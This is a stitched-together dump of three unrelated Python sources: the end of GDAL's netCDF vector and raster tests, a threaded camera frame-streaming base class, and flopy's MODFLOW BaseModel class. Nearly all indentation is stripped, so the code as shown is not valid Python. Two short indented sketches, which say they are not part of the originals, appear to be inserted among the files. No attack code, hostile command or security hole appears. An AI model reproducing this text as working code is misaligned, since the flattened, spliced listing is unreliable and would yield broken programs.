assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/empty_mline.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/empty_mline.nc")
assert(nc_tsrc is not None)
nc_layer = nc_tsrc.GetLayerByName("places");
assert(nc_layer.GetFeatureCount() == 2)
first = nc_layer.GetNextFeature()
assert(first.GetFieldAsString("NAMES") == "Somewhere")
assert(first.GetGeometryRef().ExportToWkt() == "MULTILINESTRING ((0 5,2 0))")
second = nc_layer.GetNextFeature()
assert(second.GetFieldAsString("NAMES") == "Everywhere")
assert(second.GetGeometryRef().IsEmpty())
def test_empty_multipolygon_read_write():
# Tests writing features to a layer of empty multipolygons
src = gdal.OpenEx("data/netcdf-sg/write-tests/empty_multipolygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/empty_multipolygon.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/empty_multipolygon.nc")
assert(nc_tsrc is not None)
nc_layer = nc_tsrc.GetLayerByName("places");
assert(nc_layer.GetFeatureCount() == 2)
first = nc_layer.GetNextFeature()
assert(first.GetFieldAsString("NAMES") == "Nowhere")
assert(first.GetGeometryRef().IsEmpty())
second = nc_layer.GetNextFeature()
assert(second.GetFieldAsString("NAMES") == "Somewhere")
assert(second.GetGeometryRef().ExportToWkt() == "MULTIPOLYGON (((0 0,2 0,2 2,0 2,0 0)))")
def test_states_full_layer_buffer_restrict_correctness_single_datum():
# Single datum regression test
src = gdal.OpenEx("data/netcdf-sg/write-tests/cf1.8_states.json")
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/states_4K_restrict_sd.nc", src, format="netCDF", layerCreationOptions = ['BUFFER_SIZE=4096', "GROUPLESS_WRITE_BACK=YES"])
fk_ds = ogr.Open("tmp/states_4K_restrict_sd.nc")
db_ds = ogr.Open("tmp/states_4K_restrict.nc")
fk_ds_layer = fk_ds.GetLayerByName("geometry_container")
db_ds_layer = db_ds.GetLayerByName("geometry_container")
assert(fk_ds_layer is not None)
assert(db_ds_layer is not None)
for feat in range(49):
lft = fk_ds_layer.GetNextFeature()
dft = db_ds_layer.GetNextFeature()
lftgeo = lft.GetGeometryRef()
dftgeo = dft.GetGeometryRef()
assert(lftgeo.Equal(dftgeo))
def test_netcdf_uint16_netcdf4_without_fill():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# This dataset was created with nc_def_var_fill(cdfid, nZId, NC_NOFILL, NULL)
# Check that we don't report a nodata value
ds = gdal.Open('data/uint16_netcdf4_without_fill.nc')
assert not ds.GetRasterBand(1).GetNoDataValue()
def test_netcdf_sen3_sral_mwr_fake_standard_measurement():
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.OpenEx('data/sen3_sral_mwr_fake_standard_measurement.nc', gdal.OF_RASTER)
assert not ds
ds = gdal.OpenEx('data/sen3_sral_mwr_fake_standard_measurement.nc', gdal.OF_VECTOR)
assert ds
assert ds.GetLayerCount() == 3
lyr = ds.GetLayer(0)
assert lyr.GetName() == 'sen3_sral_mwr_fake_standard_measurement_time_01'
assert lyr.GetSpatialRef() is not None
assert lyr.GetLayerDefn().GetFieldCount() == 5
assert lyr.TestCapability(ogr.OLCFastFeatureCount) == 1
assert lyr.TestCapability(ogr.OLCRandomRead) == 1
assert lyr.TestCapability(ogr.OLCRandomWrite) == 0
assert lyr.GetFeatureCount() == 2
assert lyr.GetMetadata_Dict() == {
'alt_01_comment': 'Altitude of satellite above the reference ellipsoid',
'alt_01_long_name': 'altitude of the satellite : 1 Hz',
'alt_01_standard_name': 'height_above_reference_ellipsoid',
'alt_01_units': 'm',
'orb_alt_rate_01_comment': 'The reference surface for the orbital altitude rate is the combined mean_sea_surface/geoid surface. It is used to compute the Doppler correction on the altimeter range',
'orb_alt_rate_01_long_name': 'orbital altitude rate : 1 Hz',
'orb_alt_rate_01_units': 'm/s',
'surf_type_01_flag_meanings': 'ocean_or_semi_enclosed_sea enclosed_sea_or_lake continental_ice land',
'surf_type_01_flag_values': '{0,1,2,3}',
'surf_type_01_long_name': 'surface type : 1 Hz',
'time_01_calendar': 'gregorian',
'time_01_long_name': 'UTC: 1 Hz',
'time_01_standard_name': 'time',
'time_01_units': 'seconds since 2000-01-01 00:00:00.0',
'total_electron_content_01_long_name': 'Altimeter-derived total electron content (TECU) : 1 Hz',
'total_electron_content_01_units': 'count'
}
assert lyr.GetMetadataItem('alt_01_units') == 'm'
f = lyr.GetNextFeature()
assert f.GetGeometryRef().GetX() == pytest.approx(2.234567, 1e-7)
assert f.GetGeometryRef().GetY() == pytest.approx(49.234567, 1e-7)
assert f['time_01'] == 1.25
assert not f.IsFieldSet("surf_type_01")
assert not f.IsFieldSet("orb_alt_rate_01")
assert not f.IsFieldSet("total_electron_content_01")
f = lyr.GetNextFeature()
assert f['time_01'] == 2.25
assert f['surf_type_01'] == 1
assert f['orb_alt_rate_01'] == 0.01
assert f['total_electron_content_01'] == 10000000000.0
assert lyr.GetNextFeature() is None
assert lyr.GetNextFeature() is None
lyr.ResetReading()
assert lyr.GetNextFeature() is not None
lyr.SetSpatialFilterRect(-50,-50,-50,-50)
lyr.ResetReading()
assert lyr.GetNextFeature() is None
assert lyr.GetFeatureCount() == 0
lyr.SetSpatialFilter(None)
lyr.SetAttributeFilter('0 = 1')
lyr.ResetReading()
assert lyr.GetNextFeature() is None
assert lyr.GetFeature(0) is None
assert lyr.GetFeature(1).GetFID() == 1
assert lyr.GetFeature(3) is None
lyr = ds.GetLayer(1)
assert lyr.GetName() == 'sen3_sral_mwr_fake_standard_measurement_time_20_ku'
f = lyr.GetNextFeature()
assert not f.IsFieldSet('nb_stack_20_ku')
f = lyr.GetNextFeature()
assert f['nb_stack_20_ku'] == 1
def test_netcdf_chunked_multiple():
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.Open('data/byte_chunked_multiple.nc')
assert ds.GetRasterBand(1).GetBlockSize() == [10, 10]
assert ds.GetRasterBand(1).Checksum() == 4672
def test_netcdf_chunked_not_multiple():
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.Open('data/byte_chunked_not_multiple.nc')
assert ds.GetRasterBand(1).GetBlockSize() == [15, 6]
assert ds.GetRasterBand(1).Checksum() == 4672
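# The vector tests above all follow the same open -> VectorTranslate -> re-open ->
# compare pattern.  The helper below is an illustrative sketch only (it is not part
# of the GDAL test suite); the field name "NAMES" and the expected (wkt, name)
# pairs are assumptions mirroring the tests above.
def _roundtrip_and_check(src_path, dst_path, layer_name, expected):
    """Translate src_path to netCDF at dst_path and compare (wkt, name) pairs."""
    from osgeo import gdal, ogr
    src = gdal.OpenEx(src_path, gdal.OF_VECTOR)
    assert src is not None
    gdal.VectorTranslate(dst_path, src, format="netCDF")
    out = ogr.Open(dst_path)
    layer = out.GetLayerByName(layer_name)
    assert layer is not None
    for exp_wkt, exp_name in expected:
        feat = layer.GetNextFeature()
        assert feat.GetGeometryRef().ExportToWkt() == exp_wkt
        assert feat.GetFieldAsString("NAMES") == exp_name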
def test_clean_tmp():
# [KEEP THIS AS THE LAST TEST]
# i.e. please do not add any tests after this one. Put new ones above.
# Not actually a test, just cleans up tmp...
gdaltest.clean_tmp()
pytest.skip()
|
base_camera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
import logging
logger = logging.getLogger('app')
# logger = logging.getLogger(__name__)
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].is_set():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
logger.info('BaseCamera: start background frame thread.')
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
"""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
logger.info('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any client asking for frames in
# the last 2 seconds then stop the thread
if time.time() - BaseCamera.last_access > 2:
frames_iterator.close()
logger.info('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
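# Minimal usage sketch (not part of this module): a hypothetical subclass only
# has to override frames() as a generator yielding encoded frames; BaseCamera
# handles the background thread, client signalling and idle shutdown.  The
# byte payloads below are placeholders, not real image data.
class DummyCamera(BaseCamera):
    @staticmethod
    def frames():
        import itertools
        for i in itertools.count():
            time.sleep(1 / 30)        # simulate a ~30 fps source
            yield b'frame-%d' % i     # in practice: JPEG-encoded bytes
# A client would then call:
#     camera = DummyCamera()
#     frame = camera.get_frame()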
|
mbase.py
|
"""
mbase module
This module contains the base model class from which
all of the other models inherit from.
"""
import abc
import os
import shutil
import threading
import warnings
import queue as Queue
from datetime import datetime
from shutil import which
from subprocess import Popen, PIPE, STDOUT
import copy
import numpy as np
from flopy import utils, discretization
from .version import __version__
from .discretization.grid import Grid
## Global variables
# Multiplier for individual array elements in integer and real arrays read by
# MODFLOW's U2DREL, U1DREL and U2DINT.
iconst = 1
# Printout flag. If >= 0 then array values read are printed in listing file.
iprn = -1
class FileDataEntry:
def __init__(self, fname, unit, binflag=False, output=False, package=None):
self.fname = fname
self.unit = unit
self.binflag = binflag
self.output = output
self.package = package
class FileData:
def __init__(self):
self.file_data = []
return
def add_file(self, fname, unit, binflag=False, output=False, package=None):
ipop = []
for idx, file_data in enumerate(self.file_data):
if file_data.fname == fname or file_data.unit == unit:
ipop.append(idx)
self.file_data.append(
FileDataEntry(
fname, unit, binflag=binflag, output=output, package=package
)
)
return
class ModelInterface:
def __init__(self):
self._mg_resync = True
self._modelgrid = None
def update_modelgrid(self):
if self._modelgrid is not None:
self._modelgrid = Grid(
proj4=self._modelgrid.proj4,
xoff=self._modelgrid.xoffset,
yoff=self._modelgrid.yoffset,
angrot=self._modelgrid.angrot,
)
self._mg_resync = True
@property
@abc.abstractmethod
def modelgrid(self):
raise NotImplementedError(
"must define modelgrid in child class to use this base class"
)
@property
@abc.abstractmethod
def packagelist(self):
raise NotImplementedError(
"must define packagelist in child class to use this base class"
)
@property
@abc.abstractmethod
def namefile(self):
raise NotImplementedError(
"must define namefile in child class to use this base class"
)
@property
@abc.abstractmethod
def model_ws(self):
raise NotImplementedError(
"must define model_ws in child class to use this base class"
)
@property
@abc.abstractmethod
def exename(self):
raise NotImplementedError(
"must define exename in child class to use this base class"
)
@property
@abc.abstractmethod
def version(self):
raise NotImplementedError(
"must define version in child class to use this base class"
)
@property
@abc.abstractmethod
def solver_tols(self):
raise NotImplementedError(
"must define version in child class to use this base class"
)
@abc.abstractmethod
def export(self, f, **kwargs):
raise NotImplementedError(
"must define export in child class to use this base class"
)
@property
@abc.abstractmethod
def laytyp(self):
raise NotImplementedError(
"must define laytyp in child class to use this base class"
)
@property
@abc.abstractmethod
def hdry(self):
raise NotImplementedError(
"must define hdry in child class to use this base class"
)
@property
@abc.abstractmethod
def hnoflo(self):
raise NotImplementedError(
"must define hnoflo in child class to use this base class"
)
@property
@abc.abstractmethod
def laycbd(self):
raise NotImplementedError(
"must define laycbd in child class to use this base class"
)
@property
@abc.abstractmethod
def verbose(self):
raise NotImplementedError(
"must define verbose in child class to use this base class"
)
@abc.abstractmethod
def check(self, f=None, verbose=True, level=1):
raise NotImplementedError(
"must define check in child class to use this base class"
)
def get_package_list(self, ftype=None):
"""
Get a list of all the package names.
Parameters
----------
ftype : str
Type of package, 'RIV', 'LPF', etc.
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
val = []
for pp in self.packagelist:
if ftype is None:
val.append(pp.name[0].upper())
elif pp.package_type.lower() == ftype:
val.append(pp.name[0].upper())
return val
def _check(self, chk, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
summarize : bool
Boolean flag used to determine if summary of results is written
to the screen
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
results = {}
for p in self.packagelist:
if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
results[p.name[0]] = p.check(
f=None,
verbose=False,
level=level - 1,
checktype=chk.__class__,
)
# model level checks
# solver check
if self.version in chk.solver_packages.keys():
solvers = set(chk.solver_packages[self.version]).intersection(
set(self.get_package_list())
)
if not solvers:
chk._add_to_summary(
"Error", desc="\r No solver package", package="model"
)
elif len(list(solvers)) > 1:
for s in solvers:
chk._add_to_summary(
"Error",
desc="\r Multiple solver packages",
package=s,
)
else:
chk.passed.append("Compatible solver package")
# add package check results to model level check summary
for r in results.values():
if (
r is not None and r.summary_array is not None
): # currently SFR doesn't have one
chk.summary_array = np.append(
chk.summary_array, r.summary_array
).view(np.recarray)
chk.passed += [
f"{r.package.name[0]} package: {psd}" for psd in r.passed
]
chk.summarize()
return chk
class BaseModel(ModelInterface):
"""
MODFLOW-based models base class.
Parameters
----------
modelname : str, default "modflowtest"
Name of the model, which is also used for model file names.
namefile_ext : str, default "nam"
Name file extension, without "."
exe_name : str, default "mf2k.exe"
Name of the modflow executable.
model_ws : str, optional
Path to the model workspace. Model files will be created in this
directory. Default is None, in which case model_ws is assigned
to the current working directory.
structured : bool, default True
Specify if model grid is structured (default) or unstructured.
verbose : bool, default False
Print additional information to the screen.
**kwargs : dict, optional
Used to define: ``xll``/``yll`` for the x- and y-coordinates of
the lower-left corner of the grid, ``xul``/``yul`` for the
x- and y-coordinates of the upper-left corner of the grid
(deprecated), ``rotation`` for the grid rotation (default 0.0),
``proj4_str`` for a PROJ string, and ``start_datetime`` for
model start date (default "1-1-1970").
"""
def __init__(
self,
modelname="modflowtest",
namefile_ext="nam",
exe_name="mf2k.exe",
model_ws=None,
structured=True,
verbose=False,
**kwargs,
):
"""Initialize BaseModel."""
super().__init__()
self.__name = modelname
self.namefile_ext = namefile_ext or ""
self._namefile = self.__name + "." + self.namefile_ext
self._packagelist = []
self.heading = ""
self.exe_name = exe_name
self._verbose = verbose
self.external_path = None
self.external_extension = "ref"
if model_ws is None:
model_ws = os.getcwd()
if not os.path.exists(model_ws):
try:
os.makedirs(model_ws)
except:
print(
f"\n{model_ws} not valid, "
f"workspace-folder was changed to {os.getcwd()}\n"
)
model_ws = os.getcwd()
self._model_ws = model_ws
self.structured = structured
self.pop_key_list = []
self.cl_params = ""
# check for reference info in kwargs
# we are just carrying these until a dis package is added
xll = kwargs.pop("xll", None)
yll = kwargs.pop("yll", None)
self._xul = kwargs.pop("xul", None)
self._yul = kwargs.pop("yul", None)
self._rotation = kwargs.pop("rotation", 0.0)
self._proj4_str = kwargs.pop("proj4_str", None)
self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")
# build model discretization objects
self._modelgrid = Grid(
proj4=self._proj4_str,
xoff=xll,
yoff=yll,
angrot=self._rotation,
)
self._modeltime = None
# Model file information
self.__onunit__ = 10
# external option stuff
self.array_free_format = True
self.free_format_input = True
self.parameter_load = False
self.array_format = None
self.external_fnames = []
self.external_units = []
self.external_binflag = []
self.external_output = []
self.package_units = []
self._next_ext_unit = None
# output files
self.output_fnames = []
self.output_units = []
self.output_binflag = []
self.output_packages = []
return
@property
def modeltime(self):
raise NotImplementedError(
"must define modeltime in child class to use this base class"
)
@property
def modelgrid(self):
raise NotImplementedError(
"must define modelgrid in child class to use this base class"
)
@property
def packagelist(self):
return self._packagelist
@packagelist.setter
def packagelist(self, packagelist):
self._packagelist = packagelist
@property
def namefile(self):
return self._namefile
@namefile.setter
def namefile(self, namefile):
self._namefile = namefile
@property
def model_ws(self):
return self._model_ws
@model_ws.setter
def model_ws(self, model_ws):
self._model_ws = model_ws
@property
def exename(self):
return self._exename
@exename.setter
def exename(self, exename):
self._exename = exename
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def verbose(self):
return self._verbose
@verbose.setter
def verbose(self, verbose):
self._verbose = verbose
@property
def laytyp(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").laytyp.array
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").laycon.array
if self.get_package("UPW") is not None:
return self.get_package("UPW").laytyp.array
return None
@property
def hdry(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").hdry
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").hdry
if self.get_package("UPW") is not None:
return self.get_package("UPW").hdry
return None
@property
def hnoflo(self):
try:
bas6 = self.get_package("BAS6")
return bas6.hnoflo
except AttributeError:
return None
@property
def laycbd(self):
try:
dis = self.get_package("DIS")
return dis.laycbd.array
except AttributeError:
return None
# we don't need these - no need for controlled access to array_free_format
# def set_free_format(self, value=True):
# """
# Set the free format flag for the model instance
#
# Parameters
# ----------
# value : bool
# Boolean value to set free format flag for model. (default is True)
#
# Returns
# -------
#
# """
# if not isinstance(value, bool):
# print('Error: set_free_format passed value must be a boolean')
# return False
# self.array_free_format = value
#
# def get_free_format(self):
# """
# Return the free format flag for the model
#
# Returns
# -------
# out : bool
# Free format flag for the model
#
# """
# return self.array_free_format
def next_unit(self, i=None):
if i is not None:
self.__onunit__ = i - 1
else:
self.__onunit__ += 1
return self.__onunit__
def next_ext_unit(self):
"""
Function to encapsulate next_ext_unit attribute
"""
next_unit = self._next_ext_unit + 1
self._next_ext_unit += 1
return next_unit
def export(self, f, **kwargs):
"""
Method to export a model to netcdf or shapefile based on the
extension of the file name (.shp for shapefile, .nc for netcdf)
Parameters
----------
f : str
filename
kwargs : keyword arguments
modelgrid : flopy.discretization.Grid instance
user supplied modelgrid which can be used for exporting
in lieu of the modelgrid associated with the model object
Returns
-------
None or Netcdf object
"""
from .export import utils
return utils.model_export(f, self, **kwargs)
def add_package(self, p):
"""
Add a package.
Parameters
----------
p : Package object
"""
for idx, u in enumerate(p.unit_number):
if u != 0:
if u in self.package_units or u in self.external_units:
try:
pn = p.name[idx]
except:
pn = p.name
if self.verbose:
print(
f"\nWARNING:\n unit {u} of package {pn} already in use."
)
self.package_units.append(u)
for i, pp in enumerate(self.packagelist):
if pp.allowDuplicates:
continue
elif isinstance(p, type(pp)):
if self.verbose:
print(
"\nWARNING:\n Two packages of the same type, "
f"Replacing existing '{p.name[0]}' package."
)
self.packagelist[i] = p
return
if self.verbose:
print("adding Package: ", p.name[0])
self.packagelist.append(p)
def remove_package(self, pname):
"""
Remove a package from this model
Parameters
----------
pname : string
Name of the package, such as 'RIV', 'BAS6', etc.
"""
for i, pp in enumerate(self.packagelist):
if pname.upper() in pp.name:
if self.verbose:
print("removing Package: ", pp.name)
# Remove the package object from the model's packagelist
p = self.packagelist.pop(i)
# Remove the package unit number from the list of package
# units stored with the model
for iu in p.unit_number:
if iu in self.package_units:
self.package_units.remove(iu)
return
raise StopIteration(
"Package name " + pname + " not found in Package list"
)
def __getattr__(self, item):
"""
__getattr__ - syntactic sugar
Parameters
----------
item : str
3 character package name (case insensitive) or "sr" to access
the SpatialReference instance of the ModflowDis object
Returns
-------
sr : SpatialReference instance
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
Note
----
if self.dis is not None, then the spatial reference instance is updated
using self.dis.delr, self.dis.delc, and self.dis.lenuni before being
returned
"""
if item == "output_packages" or not hasattr(self, "output_packages"):
raise AttributeError(item)
if item == "tr":
if self.dis is not None:
return self.dis.tr
else:
return None
if item == "start_datetime":
if self.dis is not None:
return self.dis.start_datetime
else:
return None
# return self.get_package(item)
# to avoid infinite recursion
if item == "_packagelist" or item == "packagelist":
raise AttributeError(item)
pckg = self.get_package(item)
if pckg is not None or item in self.mfnam_packages:
return pckg
if item == "modelgrid":
return
raise AttributeError(item)
def get_ext_dict_attr(
self, ext_unit_dict=None, unit=None, filetype=None, pop_key=True
):
iu = None
fname = None
if ext_unit_dict is not None:
for key, value in ext_unit_dict.items():
if key == unit:
iu = key
fname = os.path.basename(value.filename)
break
elif value.filetype == filetype:
iu = key
fname = os.path.basename(value.filename)
if pop_key:
self.add_pop_key_list(iu)
break
return iu, fname
def _output_msg(self, i, add=True):
if add:
txt1 = "Adding"
txt2 = "to"
else:
txt1 = "Removing"
txt2 = "from"
print(
f"{txt1} {self.output_fnames[i]} (unit={self.output_units[i]}) "
f"{txt2} the output list."
)
def add_output_file(
self, unit, fname=None, extension="cbc", binflag=True, package=None
):
"""
Add an ascii or binary output file for a package
Parameters
----------
unit : int
unit number of external array
fname : str
filename of external array. (default is None)
extension : str
extension to use for the cell-by-cell file. Only used if fname
is None. (default is cbc)
binflag : bool
boolean flag indicating if the output file is a binary file.
Default is True
package : str
string that defines the package the output file is attached to.
Default is None
"""
add_cbc = False
if unit > 0:
add_cbc = True
# determine if the file is in external_units
if abs(unit) in self.external_units:
idx = self.external_units.index(abs(unit))
if fname is None:
fname = os.path.basename(self.external_fnames[idx])
binflag = self.external_binflag[idx]
self.remove_external(unit=abs(unit))
# determine if the unit exists in the output data
if abs(unit) in self.output_units:
add_cbc = False
idx = self.output_units.index(abs(unit))
# determine if binflag has changed
if binflag is not self.output_binflag[idx]:
add_cbc = True
if add_cbc:
self.remove_output(unit=abs(unit))
else:
if package is not None:
self.output_packages[idx].append(package)
if add_cbc:
if fname is None:
fname = f"{self.name}.{extension}"
# check if this file name exists for a different unit number
if fname in self.output_fnames:
idx = self.output_fnames.index(fname)
iut = self.output_units[idx]
if iut != unit:
# include unit number in fname if package has
# not been passed
if package is None:
fname = f"{self.name}.{unit}.{extension}"
# include package name in fname
else:
fname = f"{self.name}.{package}.{extension}"
else:
fname = os.path.basename(fname)
self.add_output(fname, unit, binflag=binflag, package=package)
return
def add_output(self, fname, unit, binflag=False, package=None):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.output_fnames:
if self.verbose:
print(
"BaseModel.add_output() warning: "
f"replacing existing filename {fname}"
)
idx = self.output_fnames.index(fname)
if self.verbose:
self._output_msg(idx, add=False)
self.output_fnames.pop(idx)
self.output_units.pop(idx)
self.output_binflag.pop(idx)
self.output_packages.pop(idx)
self.output_fnames.append(fname)
self.output_units.append(unit)
self.output_binflag.append(binflag)
if package is not None:
self.output_packages.append([package])
else:
self.output_packages.append([])
if self.verbose:
self._output_msg(-1, add=True)
return
def remove_output(self, fname=None, unit=None):
"""
Remove an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
else:
msg = " either fname or unit must be passed to remove_output()"
raise Exception(msg)
return
def get_output(self, fname=None, unit=None):
"""
Get an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
return self.output_units[i]
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
return self.output_fnames[i]
return None
else:
msg = " either fname or unit must be passed to get_output()"
raise Exception(msg)
return
def set_output_attribute(self, fname=None, unit=None, attr=None):
"""
Set a variable in an output file from the model by specifying either
the file name or the unit number and a dictionary with attributes
to change.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
msg = (
" either fname or unit must be passed "
"to set_output_attribute()"
)
raise Exception(msg)
if attr is not None:
if idx is not None:
for key, value in attr.items():
if key == "binflag":
self.output_binflag[idx] = value
elif key == "fname":
self.output_fnames[idx] = value
elif key == "unit":
self.output_units[idx] = value
return
def get_output_attribute(self, fname=None, unit=None, attr=None):
"""
Get an attribute for an output file from the model by specifying either
the file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
" either fname or unit must be passed "
"to set_output_attribute()"
)
v = None
if attr is not None:
if idx is not None:
if attr == "binflag":
v = self.output_binflag[idx]
elif attr == "fname":
v = self.output_fnames[idx]
elif attr == "unit":
v = self.output_units[idx]
return v
def add_external(self, fname, unit, binflag=False, output=False):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.external_fnames:
if self.verbose:
print(
"BaseModel.add_external() warning: "
f"replacing existing filename {fname}"
)
idx = self.external_fnames.index(fname)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
if unit in self.external_units:
if self.verbose:
msg = f"BaseModel.add_external() warning: replacing existing unit {unit}"
print(msg)
idx = self.external_units.index(unit)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
self.external_fnames.append(fname)
self.external_units.append(unit)
self.external_binflag.append(binflag)
self.external_output.append(output)
return
def remove_external(self, fname=None, unit=None):
"""
Remove an external file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
"""
plist = []
if fname is not None:
for i, e in enumerate(self.external_fnames):
if fname in e:
plist.append(i)
elif unit is not None:
for i, u in enumerate(self.external_units):
if u == unit:
plist.append(i)
else:
msg = " either fname or unit must be passed to remove_external()"
raise Exception(msg)
# remove external file
j = 0
for i in plist:
ipos = i - j
self.external_fnames.pop(ipos)
self.external_units.pop(ipos)
self.external_binflag.pop(ipos)
self.external_output.pop(ipos)
j += 1
return
def add_existing_package(
self, filename, ptype=None, copy_to_model_ws=True
):
"""
Add an existing package to a model instance.
Parameters
----------
filename : str
the name of the file to add as a package
ptype : optional
the model package type (e.g. "lpf", "wel", etc). If None,
then the file extension of the filename arg is used
copy_to_model_ws : bool
flag to copy the package file into the model_ws directory.
Returns
-------
None
"""
if ptype is None:
ptype = filename.split(".")[-1]
ptype = str(ptype).upper()
# for pak in self.packagelist:
# if ptype in pak.name:
# print("BaseModel.add_existing_package() warning: " +\
# "replacing existing package {0}".format(ptype))
class Obj:
pass
fake_package = Obj()
fake_package.write_file = lambda: None
fake_package.extra = [""]
fake_package.name = [ptype]
fake_package.extension = [filename.split(".")[-1]]
fake_package.unit_number = [self.next_ext_unit()]
if copy_to_model_ws:
base_filename = os.path.split(filename)[-1]
fake_package.file_name = [base_filename]
shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
else:
fake_package.file_name = [filename]
fake_package.allowDuplicates = True
self.add_package(fake_package)
def get_name_file_entries(self):
"""
Get a string representation of the name file.
Parameters
----------
"""
lines = []
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] == 0:
continue
s = f"{p.name[i]:14s} {p.unit_number[i]:5d} {p.file_name[i]}"
if p.extra[i]:
s += " " + p.extra[i]
lines.append(s)
return "\n".join(lines) + "\n"
def has_package(self, name):
"""
Check if package name is in package list.
Parameters
----------
name : str
Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).
Returns
-------
bool
True if package name exists, otherwise False if not found.
"""
if not name:
raise ValueError("invalid package name")
name = name.upper()
for p in self.packagelist:
for pn in p.name:
if pn.upper() == name:
return True
return False
def get_package(self, name):
"""
Get a package.
Parameters
----------
name : str
Name of the package, 'RIV', 'LPF', etc. (case-insensitive).
Returns
-------
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
"""
if not name:
raise ValueError("invalid package name")
name = name.upper()
for pp in self.packagelist:
if pp.name[0].upper() == name:
return pp
return None
